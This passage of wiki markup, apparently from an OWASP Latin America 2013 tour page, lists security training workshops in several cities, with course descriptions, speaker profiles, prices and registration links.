|-&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; | [[Image:Dragonjar.jpg|150px]]&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;left&amp;quot; | '''Taller Practico De Seguridad Web'''&lt;br /&gt;
&lt;br /&gt;
'''Objetivo'''&lt;br /&gt;
&lt;br /&gt;
Obtener el conocimiento necesario para auditar la seguridad de las Aplicaciones web propias o de terceros, además de aprender a proteger y Solucionar estos fallos una vez encontrados.&lt;br /&gt;
&lt;br /&gt;
'''Descripción'''&lt;br /&gt;
&lt;br /&gt;
En este taller altamente practico descubriremos cuales son las Vulnerabilidades que encontramos mas a menudo en una aplicación web, Como explotar dichas vulnerabilidades y como asegurar nuestras Aplicaciones para evitar que estos dispositivos sean vulnerables a estos Fallos.&lt;br /&gt;
&lt;br /&gt;
'''Audiencia'''&lt;br /&gt;
&lt;br /&gt;
Estudiantes o profesionales del campo de la informática con deseos Aumentar sus conocimientos y aprender a evaluar la seguridad de las Aplicaciones web.&lt;br /&gt;
&lt;br /&gt;
'''Nivel:''' Medio&lt;br /&gt;
&lt;br /&gt;
'''Perfil del Orador:''' Jaime Andrés Restrepo Gomez&lt;br /&gt;
&lt;br /&gt;
Ingeniero en Sistemas y Telecomunicaciones de la Universidad de Manizales.&lt;br /&gt;
Consultor Independiente de Seguridad Informática con más de 6 años de experiencias en Ethical Hacking, Pen Testing y Análisis de Vulnerabilidades. Creador de La Comunidad DragonJAR, una de las comunidades de seguridad informática mas grandes de habla hispana y referente en el sector.&lt;br /&gt;
&lt;br /&gt;
Ha sido Speaker en diferentes eventos de Seguridad (EKO Party en Argentina, iSummit en Ecuador, Campus Party, Encuentro Internacional de Seguridad informÃ¡tica, Congreso de Hacking ético, SegurINFO, entre muchos otros) y miembro del Comité Organizador del Encuentro Internacional de Seguridad informática.&lt;br /&gt;
&lt;br /&gt;
'''Duracion:''' 8 horas&lt;br /&gt;
&lt;br /&gt;
'''Precio:''' U$S300 No miembros / U$S250 Miembros OWASP. Existen tambien descuentos para grupos.&lt;br /&gt;
&lt;br /&gt;
'''Para mayor informacion y registro''': [http://www.regonline.com/owasplatamtour13bogtrainingpentest HAGA CLIC AQUI!]'''&amp;lt;br&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| align=&amp;quot;center&amp;quot; style=&amp;quot;background: #4B0082;&amp;quot; colspan=&amp;quot;2&amp;quot; | &amp;lt;span style=&amp;quot;color:#ffffff&amp;quot;&amp;gt;'''CARACAS - VENEZUELA'''&amp;lt;/span&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;width:20%&amp;quot; valign=&amp;quot;middle&amp;quot;  bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | '''Fecha''' &lt;br /&gt;
| style=&amp;quot;width:80%&amp;quot; valign=&amp;quot;middle&amp;quot;  bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | '''Lugar'''&lt;br /&gt;
|-&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#dbdbf3&amp;quot; align=&amp;quot;center&amp;quot; | Sabado 23 de marzo de 2013&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#dbdbf3&amp;quot; align=&amp;quot;left&amp;quot; | UCV - Universidad Central de Venezuela - Facultad de Ciencias - Salones de la Facultad&lt;br /&gt;
|-&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; | [[Image:Pablo_ramos.PNG|150px]]&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;left&amp;quot; | '''Taller: “Análisis de malware: métodos y técnicas”'''&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;Pocos usuarios pueden jactarse de no haberse infectado jamás con un código malicioso. Es aún menos probable, que la mayoría de las empresas puedan afirmar que nunca sufrieron una infección de un virus, gusano o troyano en su red. El malware no ha dejado de ser, a pesar de su antigüedad, la amenaza masiva que más afecta a usuarios y empresas de todo el mundo. Conocer en profundidad su funcionamiento es una forma de comprender por qué el malware posee tanta efectividad y, a la vez, permite pensar en medidas de protección, prevención y mitigación ante las infecciones tanto en entornos personales, como en redes corporativas.&lt;br /&gt;
 &lt;br /&gt;
El equipo de Educación e Investigación de ESET Latinoamérica ofrece este curso donde se compartirán las herramientas, las técnicas y las metodologías para el análisis de malware, enfocados principalmente en metodologías de análisis dinámico de códigos maliciosos, ejecutando la amenaza y utilizando distintas herramientas para identificar cuál es el comportamiento de la amenaza en un sistema. Aunque se dictarán las bases conceptuales, el curso es mayormente práctico. Los asistentes podrán “jugar” en entornos controlados con los códigos maliciosos, y así poner en práctica sus conocimientos.&lt;br /&gt;
&lt;br /&gt;
'''Perﬁl del orador'''&lt;br /&gt;
&lt;br /&gt;
Pablo Ramos se desempeña actualmente como Security Researcher para ESET Latinoamérica, empresa dedicada al desarrollo, investigación y comercialización de soluciones de protección antivirus y seguridad informática.&lt;br /&gt;
&lt;br /&gt;
Antes de su ingreso a ESET Latinoamérica, Ramos se desempeñó como Consultor Técnico en Barcelona04/Computing Group en donde tuvo la posibilidad de incrementar sus conocimientos sobre distintas plataformas y bases de datos.&lt;br /&gt;
&lt;br /&gt;
'''Duracion:''' 8 horas&lt;br /&gt;
&lt;br /&gt;
'''Precio:'''  Para No miembros 1250 Bs/200 UDS | Para Estudiantes y Miembros de Owasp 945 Bs/150 UDS &amp;lt;Br&amp;gt;. Existen también descuentos para grupos.&lt;br /&gt;
&lt;br /&gt;
'''NOTA IMPORTANTE''': El precio expresado en Bolívares es netamente referencial, el débito se cargara a su Tarjeta de Crédito en Dolares Americanos UDS, Es imprescindible utilizar la tarjeta asociada a su cupo CADIVI para realizar el pago.  &lt;br /&gt;
&lt;br /&gt;
  &lt;br /&gt;
'''Para mayor informacion y registro''': [http://www.regonline.com/owasplatamtour13ccstrainingmalware HAGA CLIC AQUI!]'''&amp;lt;br&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; | [[Image:Rubenrec.jpg|150px]]&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;left&amp;quot; | '''Taller: “ Introducción al Pentest”'''&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Objetivo'''&lt;br /&gt;
&lt;br /&gt;
Curso de Introduccion a realización de Auditorías, orientado a todos los profesionales con conocimientos generales de Seguridad Informática que deseen introducirse en las metodologías de los tests de penetracion. Dirigido a: Profesionales con conocimientos generales de seguridad informática que deseen introducirse en las metodologías de realización de Tests de Intrusión &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Descripción'''&lt;br /&gt;
&lt;br /&gt;
En este taller altamente practico y se incluirán temas como:&lt;br /&gt;
&lt;br /&gt;
&amp;gt; Etapas en los Test de Penetración (Reconocimiento y enumeración, análisis y explotación)&lt;br /&gt;
&amp;gt; Pruebas de penetración a aplicaciones web&lt;br /&gt;
&amp;gt; Pruebas de penetración en redes locales&lt;br /&gt;
&amp;gt; Creación de exploits básicos y técnicas de explotación&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Audiencia'''&lt;br /&gt;
&lt;br /&gt;
Dirigido a: Estudiantes y Profesionales con conocimientos generales de seguridad informática que deseen introducirse en las metodologías de realización de Tests de penetración.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Nivel:''' Medio&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Perﬁl del orador'''&lt;br /&gt;
Rubén Recabarren&lt;br /&gt;
&lt;br /&gt;
Egresado con honores de la Universidad de Michigan, Ann Arbor, con triple licenciatura en Biofísica, Bioquímica y Matemática Pura. Egresado también con honores de la Universidad Simón Bolívar como Ingeniero de la Computación. Adicionalmente, posee más de 10 certificaciones internacionales en diversas especialidades de la seguridad informática como manejo de incidentes, análisis forense y pruebas de penetración. &lt;br /&gt;
&lt;br /&gt;
Rubén Recabarren es una de las 3 únicas personas en el mundo en haber alcanzado las más altas certificaciones de seguridad informática: ISSAP y GSE que confieren dos de las organizaciones más importantes del área a nivel global: ISC2 y GIAC respectivamente. Actualmente trabaja como consultor de arquitectura de seguridad informática especializado en pruebas de penetración y criptografía, adicional a esto es Mentor local de SANS y escribe preguntas para los exámenes de certificación de la GIAC &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Duracion:''' 8 horas&lt;br /&gt;
&lt;br /&gt;
'''Precio:''' Para No miembros 1250 Bs/200 UDS | Para Estudiantes y Miembros de Owasp 945 Bs/150 UDS  &amp;lt;Br&amp;gt;. Existen también descuentos para grupos.&lt;br /&gt;
&lt;br /&gt;
'''NOTA IMPORTANTE''': El precio expresado en Bolívares es netamente referencial, el débito se cargara a su Tarjeta de Crédito en Dolares Americanos UDS, Es imprescindible utilizar la tarjeta asociada a su cupo CADIVI para realizar el pago.&lt;br /&gt;
  &lt;br /&gt;
'''Para mayor información y registro''': [http://www.regonline.com/owasplatamtour13ccstrainingpentest HAGA CLIC AQUI!]'''&amp;lt;br&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| align=&amp;quot;center&amp;quot; style=&amp;quot;background: #4B0082;&amp;quot; colspan=&amp;quot;2&amp;quot; | &amp;lt;span style=&amp;quot;color:#ffffff&amp;quot;&amp;gt;'''LIMA - PERU'''&amp;lt;/span&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;width:20%&amp;quot; valign=&amp;quot;middle&amp;quot;  bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | '''Fecha''' &lt;br /&gt;
| style=&amp;quot;width:80%&amp;quot; valign=&amp;quot;middle&amp;quot;  bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | '''Lugar'''&lt;br /&gt;
|-&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#dbdbf3&amp;quot; align=&amp;quot;center&amp;quot; | Lunes 25 de marzo de 2013&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#dbdbf3&amp;quot; align=&amp;quot;left&amp;quot; | Escuela de Postgrado - Universidad Tecnológica del Perú (UTP). Av. Salaverry 2443 - San Isidro&lt;br /&gt;
|-&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; | [[Image:Pablo_ramos.PNG|150px]]&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;left&amp;quot; | '''Taller: “Análisis de malware: métodos y técnicas”'''&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;Pocos usuarios pueden jactarse de no haberse infectado jamás con un código malicioso. Es aún menos probable, que la mayoría de las empresas puedan afirmar que nunca sufrieron una infección de un virus, gusano o troyano en su red. El malware no ha dejado de ser, a pesar de su antigüedad, la amenaza masiva que más afecta a usuarios y empresas de todo el mundo. Conocer en profundidad su funcionamiento es una forma de comprender por qué el malware posee tanta efectividad y, a la vez, permite pensar en medidas de protección, prevención y mitigación ante las infecciones tanto en entornos personales, como en redes corporativas.&lt;br /&gt;
 &lt;br /&gt;
El equipo de Educación e Investigación de ESET Latinoamérica ofrece este curso donde se compartirán las herramientas, las técnicas y las metodologías para el análisis de malware, enfocados principalmente en metodologías de análisis dinámico de códigos maliciosos, ejecutando la amenaza y utilizando distintas herramientas para identificar cuál es el comportamiento de la amenaza en un sistema. Aunque se dictarán las bases conceptuales, el curso es mayormente práctico. Los asistentes podrán “jugar” en entornos controlados con los códigos maliciosos, y así poner en práctica sus conocimientos.&lt;br /&gt;
&lt;br /&gt;
'''Perﬁl del orador'''&lt;br /&gt;
&lt;br /&gt;
Pablo Ramos se desempeña actualmente como Security Researcher para ESET Latinoamérica, empresa dedicada al desarrollo, investigación y comercialización de soluciones de protección antivirus y seguridad informática.&lt;br /&gt;
&lt;br /&gt;
Antes de su ingreso a ESET Latinoamérica, Ramos se desempeñó como Consultor Técnico en Barcelona04/Computing Group en donde tuvo la posibilidad de incrementar sus conocimientos sobre distintas plataformas y bases de datos.&lt;br /&gt;
&lt;br /&gt;
'''Duracion:''' 8 horas&lt;br /&gt;
&lt;br /&gt;
'''Precio:''' U$S200 No miembros / U$S150 Miembros OWASP. Existen tambien descuentos para grupos.&lt;br /&gt;
  &lt;br /&gt;
'''Para mayor informacion y registro''': [http://www.regonline.com/owasplatamtour13limtrainingmalware HAGA CLIC AQUI!]'''&amp;lt;br&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; | [[Image:Dragonjar.jpg|150px]]&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;left&amp;quot; | '''Taller Practico De Seguridad Web'''&lt;br /&gt;
&lt;br /&gt;
'''Objetivo'''&lt;br /&gt;
&lt;br /&gt;
Obtener el conocimiento necesario para auditar la seguridad de las Aplicaciones web propias o de terceros, además de aprender a proteger y Solucionar estos fallos una vez encontrados.&lt;br /&gt;
&lt;br /&gt;
'''Descripción'''&lt;br /&gt;
&lt;br /&gt;
En este taller altamente practico descubriremos cuales son las Vulnerabilidades que encontramos mas a menudo en una aplicación web, Como explotar dichas vulnerabilidades y como asegurar nuestras Aplicaciones para evitar que estos dispositivos sean vulnerables a estos Fallos.&lt;br /&gt;
&lt;br /&gt;
'''Audiencia'''&lt;br /&gt;
&lt;br /&gt;
Estudiantes o profesionales del campo de la informática con deseos Aumentar sus conocimientos y aprender a evaluar la seguridad de las Aplicaciones web.&lt;br /&gt;
&lt;br /&gt;
'''Nivel:''' Medio&lt;br /&gt;
&lt;br /&gt;
'''Perfil del Orador:''' Jaime Andrés Restrepo Gomez&lt;br /&gt;
&lt;br /&gt;
Ingeniero en Sistemas y Telecomunicaciones de la Universidad de Manizales.&lt;br /&gt;
Consultor Independiente de Seguridad Informática con más de 6 años de experiencias en Ethical Hacking, Pen Testing y Análisis de Vulnerabilidades. Creador de La Comunidad DragonJAR, una de las comunidades de seguridad informática mas grandes de habla hispana y referente en el sector.&lt;br /&gt;
&lt;br /&gt;
Ha sido Speaker en diferentes eventos de Seguridad (EKO Party en Argentina, iSummit en Ecuador, Campus Party, Encuentro Internacional de Seguridad informÃ¡tica, Congreso de Hacking ético, SegurINFO, entre muchos otros) y miembro del Comité Organizador del Encuentro Internacional de Seguridad informática.&lt;br /&gt;
&lt;br /&gt;
'''Duracion:''' 8 horas&lt;br /&gt;
&lt;br /&gt;
'''Precio:''' U$S200 No miembros / U$S150 Miembros OWASP. Existen tambien descuentos para grupos.&lt;br /&gt;
&lt;br /&gt;
'''Para mayor informacion y registro''': [http://www.regonline.com/owasplatamtour13limtrainingpentest HAGA CLIC AQUI!]'''&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; | [[Image:Cerullof.jpg|150px]]&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;left&amp;quot; | '''Taller: Desarrollo Seguro usando OWASP ESAPI'''&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Este curso tiene como objetivo proporcionar los conocimientos y recursos necesarios para mejorar la seguridad de las aplicaciones Java utilizando las librerias OWASP Enterprise Security API (ESAPI). Estas librerias se han diseñado para que sea más fácil para los desarrolladores mejorar la seguridad en aplicaciones existentes, como asi tambien utilizarlas como base para el desarrollo de nuevas aplicaciones. Los principios generales aprendidos en el curso se puede aplicar en el contexto de otros lenguajes de programación.&lt;br /&gt;
&lt;br /&gt;
'''Perﬁl del orador'''&lt;br /&gt;
&lt;br /&gt;
Fabio Cerullo, CEO y fundador de Cycubix, ayuda a clientes de todo el mundo a mejorar la seguridad de aplicaciones desarrolladas internamente o por terceros, mediante la definición de políticas y normas, implementando iniciativas de desarrollo seguro y gestión de riesgos, así como brindando capacitación sobre el tema a desarrolladores, auditores, ejecutivos y profesionales.&amp;lt;br&amp;gt;&lt;br /&gt;
Como miembro de la Fundación OWASP, Fabio se encarga de coordinar actividades globales de concientizacion sobre seguridad de aplicaciones con empresas privadas, gobiernos e instituciones educativas.&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Duracion:''' 8 horas&lt;br /&gt;
&lt;br /&gt;
'''Precio:''' U$S200 No miembros / U$S150 Miembros OWASP. Existen tambien descuentos para grupos.&lt;br /&gt;
&lt;br /&gt;
'''Para mayor informacion y registro''': [http://www.regonline.com/latamtour13limtrainingesapi HAGA CLIC AQUI!]'''&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
| align=&amp;quot;center&amp;quot; style=&amp;quot;background: #4B0082;&amp;quot; colspan=&amp;quot;2&amp;quot; | &amp;lt;span style=&amp;quot;color:#ffffff&amp;quot;&amp;gt;'''QUITO - ECUADOR'''&amp;lt;/span&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;width:20%&amp;quot; valign=&amp;quot;middle&amp;quot;  bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | '''Fecha''' &lt;br /&gt;
| style=&amp;quot;width:80%&amp;quot; valign=&amp;quot;middle&amp;quot;  bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | '''Lugar'''&lt;br /&gt;
|-&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#dbdbf3&amp;quot; align=&amp;quot;center&amp;quot; | Miercoles 27 de marzo de 2013&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#dbdbf3&amp;quot; align=&amp;quot;left&amp;quot; | UTPL - Universidad Tecnica Particular de Loja - Sede Quito | Av. 6 de Diciembre Nº 31-47 y Alpallana&lt;br /&gt;
|-&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; | [[Image:Pablo_ramos.PNG|150px]]&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;left&amp;quot; | '''Taller: “Análisis de malware: métodos y técnicas”'''&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;Pocos usuarios pueden jactarse de no haberse infectado jamás con un código malicioso. Es aún menos probable, que la mayoría de las empresas puedan afirmar que nunca sufrieron una infección de un virus, gusano o troyano en su red. El malware no ha dejado de ser, a pesar de su antigüedad, la amenaza masiva que más afecta a usuarios y empresas de todo el mundo. Conocer en profundidad su funcionamiento es una forma de comprender por qué el malware posee tanta efectividad y, a la vez, permite pensar en medidas de protección, prevención y mitigación ante las infecciones tanto en entornos personales, como en redes corporativas.&lt;br /&gt;
 &lt;br /&gt;
El equipo de Educación e Investigación de ESET Latinoamérica ofrece este curso donde se compartirán las herramientas, las técnicas y las metodologías para el análisis de malware, enfocados principalmente en metodologías de análisis dinámico de códigos maliciosos, ejecutando la amenaza y utilizando distintas herramientas para identificar cuál es el comportamiento de la amenaza en un sistema. Aunque se dictarán las bases conceptuales, el curso es mayormente práctico. Los asistentes podrán “jugar” en entornos controlados con los códigos maliciosos, y así poner en práctica sus conocimientos.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''Perﬁl del orador'''&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Pablo Ramos se desempeña actualmente como Security Researcher para ESET Latinoamérica, empresa dedicada al desarrollo, investigación y comercialización de soluciones de protección antivirus y seguridad informática.&lt;br /&gt;
&lt;br /&gt;
Antes de su ingreso a ESET Latinoamérica, Ramos se desempeñó como Consultor Técnico en Barcelona04/Computing Group en donde tuvo la posibilidad de incrementar sus conocimientos sobre distintas plataformas y bases de datos.&lt;br /&gt;
&lt;br /&gt;
'''Duracion:''' 8 horas&lt;br /&gt;
&lt;br /&gt;
'''Precio:''' U$S200 No miembros / U$S150 Miembros OWASP. Existen tambien descuentos para grupos.&lt;br /&gt;
  &lt;br /&gt;
'''Para mayor informacion y registro''': [http://www.regonline.com/owasplatamtour13uiotrainingmalware HAGA CLIC AQUI!]'''&amp;lt;br&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; | [[Image:Cerullof.jpg|150px]]&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;left&amp;quot; | '''Taller: Desarrollo Seguro usando OWASP ESAPI'''&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Este curso tiene como objetivo proporcionar los conocimientos y recursos necesarios para mejorar la seguridad de las aplicaciones Java utilizando las librerias OWASP Enterprise Security API (ESAPI). Estas librerias se han diseñado para que sea más fácil para los desarrolladores mejorar la seguridad en aplicaciones existentes, como asi tambien utilizarlas como base para el desarrollo de nuevas aplicaciones. Los principios generales aprendidos en el curso se puede aplicar en el contexto de otros lenguajes de programación.&lt;br /&gt;
&lt;br /&gt;
'''Perﬁl del orador'''&lt;br /&gt;
&lt;br /&gt;
Fabio Cerullo, CEO y fundador de Cycubix, ayuda a clientes de todo el mundo a mejorar la seguridad de aplicaciones desarrolladas internamente o por terceros, mediante la definición de políticas y normas, implementando iniciativas de desarrollo seguro y gestión de riesgos, así como brindando capacitación sobre el tema a desarrolladores, auditores, ejecutivos y profesionales.&amp;lt;br&amp;gt;&lt;br /&gt;
Como miembro de la Fundación OWASP, Fabio se encarga de coordinar actividades globales de concientizacion sobre seguridad de aplicaciones con empresas privadas, gobiernos e instituciones educativas.&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Duracion:''' 8 horas&lt;br /&gt;
&lt;br /&gt;
'''Precio:''' U$S200 No miembros / U$150 Miembros OWASP. Existen tambien descuentos para grupos.&lt;br /&gt;
&lt;br /&gt;
'''Para mayor informacion y registro''': [http://www.regonline.com/latamtour13uiotraining2 HAGA CLIC AQUI!]'''&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; | PIC&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;left&amp;quot; | '''Taller: Penetration Testing de Aplicaciones Web'''&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Las pruebas de intrusión a aplicaciones web son auditorías de seguridad en las que el penetration tester actúa como lo haría un posible atacante, pero con autorización; con el objetivo de analizar, encontrar y explotar vulnerabilidades de aplicaciones web corporativas.&lt;br /&gt;
El curso se basará en el OWASP Top 10 y en OWASP Testing Guide, como marcos de referencia para realizar todo el proceso de pentest de aplicaciones web.&lt;br /&gt;
&lt;br /&gt;
'''Duracion:''' 8 horas&lt;br /&gt;
&lt;br /&gt;
'''Precio:''' U$S200 No miembros / U$S150 Miembros OWASP. Existen tambien descuentos para grupos.&lt;br /&gt;
&lt;br /&gt;
'''Para mayor informacion y registro''': [http://www.regonline.com/latamtour13uiotraining1 HAGA CLIC AQUI!]'''&amp;lt;br&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
|-&lt;br /&gt;
| align=&amp;quot;center&amp;quot; style=&amp;quot;background: #4B0082;&amp;quot; colspan=&amp;quot;2&amp;quot; | &amp;lt;span style=&amp;quot;color:#ffffff&amp;quot;&amp;gt;'''MONTEVIDEO - URUGUAY'''&amp;lt;/span&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;width:20%&amp;quot; valign=&amp;quot;middle&amp;quot;  bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | '''Fecha''' &lt;br /&gt;
| style=&amp;quot;width:80%&amp;quot; valign=&amp;quot;middle&amp;quot;  bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | '''Lugar'''&lt;br /&gt;
|-&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#dbdbf3&amp;quot; align=&amp;quot;center&amp;quot; | Martes 2 de abril de 2013&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#dbdbf3&amp;quot; align=&amp;quot;left&amp;quot; | Universidad Catolica del Uruguay&lt;br /&gt;
|-&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; | [[Image:Cerullof.jpg|150px]]&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;left&amp;quot; | '''Taller: Desarrollo Seguro usando OWASP ESAPI'''&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Este curso tiene como objetivo proporcionar los conocimientos y recursos necesarios para mejorar la seguridad de las aplicaciones Java utilizando las librerias OWASP Enterprise Security API (ESAPI). Estas librerias se han diseñado para que sea más fácil para los desarrolladores mejorar la seguridad en aplicaciones existentes, como asi tambien utilizarlas como base para el desarrollo de nuevas aplicaciones. Los principios generales aprendidos en el curso se puede aplicar en el contexto de otros lenguajes de programación.&lt;br /&gt;
&lt;br /&gt;
'''Perﬁl del orador'''&lt;br /&gt;
&lt;br /&gt;
Fabio Cerullo, CEO y fundador de Cycubix, ayuda a clientes de todo el mundo a mejorar la seguridad de aplicaciones desarrolladas internamente o por terceros, mediante la definición de políticas y normas, implementando iniciativas de desarrollo seguro y gestión de riesgos, así como brindando capacitación sobre el tema a desarrolladores, auditores, ejecutivos y profesionales.&amp;lt;br&amp;gt;&lt;br /&gt;
Como miembro de la Fundación OWASP, Fabio se encarga de coordinar actividades globales de concientizacion sobre seguridad de aplicaciones con empresas privadas, gobiernos e instituciones educativas.&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Duracion:''' 8 horas&lt;br /&gt;
&lt;br /&gt;
'''Precio:''' U$S300 No miembros / U$S250 Miembros OWASP. Existen tambien descuentos para grupos.&lt;br /&gt;
&lt;br /&gt;
'''Para mayor informacion y registro''': [http://www.regonline.com/latamtour13urutrainingesapi HAGA CLIC AQUI!]'''&amp;lt;br&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; | [[Image:Cristian-borghello-P.jpg|150px]]&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;left&amp;quot; | '''OWASP para Pentesters'''&lt;br /&gt;
&lt;br /&gt;
Los desarrolladores son una raza extraña. Los Pentesters viven en una burbuja. Este entrenamiento ayuda a los desarrolladores a conocer sobre seguridad en el desarrollo web y a los Pentesters a probar aplicaciones web de forma adecuada.&lt;br /&gt;
&lt;br /&gt;
Orientado a desarrolladores, pentesters y personas relacionados con el ciclo de vida del desarrollo de software o sus pruebas de seguridad.&lt;br /&gt;
&lt;br /&gt;
'''Nivel:''' Intermedio&lt;br /&gt;
&lt;br /&gt;
'''Objetivos:'''&lt;br /&gt;
&lt;br /&gt;
- Conocer OWASP Top 10 (quick summary)&lt;br /&gt;
- Aprender cómo comprobar cada vulnerabilidad desde el punto de vista del Desarrollador y del Pentester&lt;br /&gt;
- Conocer recomendaciones desde el punto de vista del Pentester&lt;br /&gt;
- Conocer recomendaciones desde el punto de vista del Desarrollador&lt;br /&gt;
&lt;br /&gt;
'''Perfil del orador'''&lt;br /&gt;
&lt;br /&gt;
